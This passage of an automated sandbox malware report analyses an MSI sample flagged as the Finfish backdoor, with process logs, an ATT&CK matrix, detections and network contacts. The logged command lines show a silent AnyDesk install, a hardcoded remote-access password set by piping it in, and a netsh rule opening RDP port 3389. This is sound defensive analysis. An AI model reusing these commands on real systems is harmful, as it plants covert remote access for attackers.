Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\anydesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe TID: 2948Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 264Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 868Thread sleep time: -660000s >= -30000s
Source: C:\Windows\System32\VSSVC.exe TID: 316Thread sleep time: -900000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2408Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2944Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2068Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2676Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 904Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492Thread sleep count: 1273 > 30
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492Thread sleep count: 647 > 30
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492Thread sleep count: 181 > 30
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe TID: 2492Thread sleep count: 47 > 30
Source: C:\ProgramData\anydesk.exe TID: 2012Thread sleep time: -300000s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 2184Thread sleep time: -420000s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1224Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1040Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 464Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1224Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1544Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 2468Thread sleep time: -2767011611056431s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 848Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\anydesk\AnyDesk.exe TID: 1656Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 672Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeThread sleep count: Count: 1273 delay: -10
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeWindow / User API: threadDelayed 1273
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeWindow / User API: threadDelayed 647
Source: C:\Windows\System32\svchost.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\anydesk\AnyDesk.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: VSSVC.exe, 00000003.00000002.1168516119.000000000172F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: svchost.exe, 00000004.00000003.984456495.0000000000324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000004.00000002.1166912198.00000000002EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: svchost.exe, 00000004.00000002.1167619042.0000000001201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: si#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}>>
Source: svchost.exe, 00000004.00000003.984328347.0000000000324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
Source: svchost.exe, 00000004.00000002.1167619042.0000000001201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#5&22be343f&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}00
Source: C:\ProgramData\anydesk.exeCode function: 16_2_015B0229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01817257 LoadLibraryW,GetProcAddress,GetProcAddress,RtlEncodePointer,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory protected: page read and write | page guard
Source: C:\ProgramData\anydesk.exeCode function: 16_2_015B0229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01810229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01810229 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_0180743D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_0180743D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\anydesk\AnyDesk.exeFile opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dll
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe "c:\programdata\anydesk\anydesk.exe" --get-id
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk.exe c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\VSSVC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_016F9BE0 _vswprintf_s,WaitForSingleObject,OutputDebugStringA,GetSystemTime,TlsGetValue,__itow,GetCurrentThreadId,GetCurrentProcessId,__snprintf,SetFilePointer,SetFilePointer,ReadFile,_memmove,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,WriteFile,RtlEnterCriticalSection,RaiseException,

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Source: install.exe, 0000000B.00000003.1118766580.0000000000946000.00000004.00000020.00020000.00000000.sdmp, install.exe, 0000000B.00000003.1118897172.000000000095E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: procdump.exe
Source: AnyDesk.exe, 00000014.00000002.1170344791.0000000001E7A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: release/win_7.0.x
Source: AnyDesk.exe, 00000014.00000002.1170344791.0000000001E7A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: .itext.text.customf97bed53183a234c33acc24231b422c4release/win_7.0.x96f8d80eac273a9144abccce2f66dbc2200cc81d
Source: anydesk.exe, 00000010.00000002.1077981622.0000000001BA0000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: 96f8d80eac273a9144abccce2f66dbc2200cc81drelease/win_7.0.xf97bed53183a234c33acc24231b422c4

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media		1
Native API		1
LSASS Driver		1
LSASS Driver		211
Disable or Modify Tools		1
Input Capture		1
System Time Discovery		1
Replication Through Removable Media		1
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Command and Scripting Interpreter		1
Image File Execution Options Injection		1
Image File Execution Options Injection		1
Obfuscated Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Input Capture		Exfiltration Over Bluetooth12
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)2
Windows Service		1
Access Token Manipulation		11
Software Packing		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Standard Port		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)1
Registry Run Keys / Startup Folder		2
Windows Service		1
File Deletion		NTDS14
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer1
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCron1
Services File Permissions Weakness		11
Process Injection		21
Masquerading		LSA Secrets131
Security Software Discovery		SSHKeyloggingData Transfer Size Limits2
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.common1
Registry Run Keys / Startup Folder		41
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup Items1
Services File Permissions Weakness		1
Access Token Manipulation		DCSync41
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
Process Injection		Proc Filesystem1
Application Window Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Hidden Files and Directories		/etc/passwd and /etc/shadow1
Remote System Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
Hidden Users		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
Services File Permissions Weakness		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 679413 Sample: 1.msi Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 79 Antivirus detection for dropped file 2->79 81 Antivirus / Scanner detection for submitted sample 2->81 83 Multi AV Scanner detection for dropped file 2->83 85 Multi AV Scanner detection for submitted file 2->85 9 msiexec.exe 92 29 2->9         started        13 AnyDesk.exe 3 2->13         started        16 AnyDesk.exe 2 2->16         started        18 7 other processes 2->18 process3 dnsIp4 71 192.168.2.3 unknown unknown 9->71 59 C:\Windows\Installer\78c344.msi, Composite 9->59 dropped 61 C:\Windows\Installer\78c341.msi, Composite 9->61 dropped 63 C:\Windows\Installer\MSIED31.tmp, PE32 9->63 dropped 65 3 other files (none is malicious) 9->65 dropped 20 msiexec.exe 1 2 9->20         started        22 msiexec.exe 3 9->22         started        73 boot.net.anydesk.com 92.223.88.41, 49176, 80 GCOREAT Austria 13->73 75 195.181.174.167, 443, 49175 CDN77GB United Kingdom 13->75 77 195.181.174.174, 49177, 6568 CDN77GB United Kingdom 13->77 95 Detected unpacking (changes PE section rights) 13->95 file5 signatures6 process7 process8 24 install.exe 5 3 20->24         started        29 expand.exe 4 20->29         started        31 icacls.exe 20->31         started        33 icacls.exe 20->33         started        35 cmd.exe 22->35         started        dnsIp9 69 80.209.241.3, 20000, 49178 HOSTKEY-USAUS United States 24->69 53 C:\programdata\anydesk.exe, PE32 24->53 dropped 87 Creates an undocumented autostart registry key 24->87 89 Hides user accounts 24->89 91 Uses netsh to modify the Windows network and firewall settings 24->91 93 Modifies the windows firewall 24->93 37 cmd.exe 24->37         started        39 cmd.exe 24->39         started        41 netsh.exe 24->41         started        43 AnyDesk.exe 1 24->43         started        55 C:\Users\user\AppData\...\install.exe (copy), PE32 29->55 dropped 57 C:\...\eee52229ee24a34cb61191d27a7b66f1.tmp, PE32 29->57 dropped file10 signatures11 process12 process13 45 anydesk.exe 23 6 37->45         started        49 AnyDesk.exe 1 39->49         started        51 cmd.exe 39->51         started        file14 67 C:\ProgramData\anydesk\AnyDesk.exe, PE32 45->67 dropped 97 Detected unpacking (changes PE section rights) 45->97 99 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->99 signatures15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1.msi48%VirustotalBrowse
1.msi30%ReversingLabsWin32.Backdoor.Finfish
1.msi100%AviraBDS/Finfish.ujrxw

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\Installer\78c344.msi100%AviraBDS/Finfish.ujrxw
C:\Windows\Installer\78c341.msi100%AviraBDS/Finfish.ujrxw
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp100%AviraTR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp100%Joe Sandbox ML
C:\ProgramData\anydesk\AnyDesk.exe0%VirustotalBrowse
C:\ProgramData\anydesk\AnyDesk.exe3%MetadefenderBrowse
C:\ProgramData\anydesk\AnyDesk.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp64%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp22%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp65%ReversingLabsWin32.Backdoor.Finfish
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)64%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)22%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)65%ReversingLabsWin32.Backdoor.Finfish
C:\Windows\Installer\MSI5BE8.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI5BE8.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI5BE8.tmp0%ReversingLabs
C:\Windows\Installer\MSIB0A0.tmp0%VirustotalBrowse
C:\Windows\Installer\MSIB0A0.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSIB0A0.tmp0%ReversingLabs
C:\Windows\Installer\MSIBA33.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSIBA33.tmp0%ReversingLabs
C:\Windows\Installer\MSIED31.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSIED31.tmp0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
11.0.install.exe.400000.4.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.7.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.3.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.5.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
11.2.install.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
11.0.install.exe.400000.6.unpack100%AviraTR/Dropper.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalid0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
boot.net.anydesk.com
92.223.88.41
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://anydesk.comAnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://support.anydesk.com/anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.opengl.org/registry/anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://help.anydesk.com/error-messagesanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://order.anydesk.com/trialanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://anydesk.com/updateanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://www.google.com/intl/$anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
